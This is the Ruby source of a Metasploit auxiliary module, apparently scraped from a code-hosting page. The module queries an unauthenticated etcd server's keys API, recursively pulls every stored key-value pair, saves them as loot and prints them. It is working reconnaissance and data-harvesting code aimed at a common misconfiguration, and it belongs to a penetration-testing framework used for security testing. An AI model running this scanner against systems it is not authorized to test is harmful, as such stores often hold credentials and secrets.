Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/scanner/etcd/open_key_scanner.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Etcd9include Msf::Auxiliary::Scanner1011def initialize12super(13'Name' => 'Etcd Keys API Information Gathering',14'Description' => %q(15This module queries the etcd API to recursively retrieve all of the stored16key value pairs. Etcd by default does not utilize authentication.17),18'References' => [19['URL', 'https://gcollazo.com/the-security-footgun-in-etcd/']20],21'Author' => [22'Giovanni Collazo <[email protected]>', # discovery23'h00die' # msf module24],25'License' => MSF_LICENSE,26'DisclosureDate' => "Mar 16 2018"27)28end2930def run_host(_target_host)31path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')3233banner = fingerprint_service(target_uri.to_s)34vprint_status("#{peer} - Collecting data through #{path}...")35res = send_request_raw(36'uri' => path,37'method' => 'GET'38)3940# parse the json if we got a good request back41if res && res.code == 20042begin43response = res.get_json_document44store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')45rescue JSON::ParserError => e46print_error("Failed to read JSON: #{e.class} - #{e.message}}")47return48end49print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")50elsif res51vprint_errord("Invalid response #{res.code} for etcd open keys response")52return53else54verbose_error("No response for etcd open keys probe")55return56end57end58end596061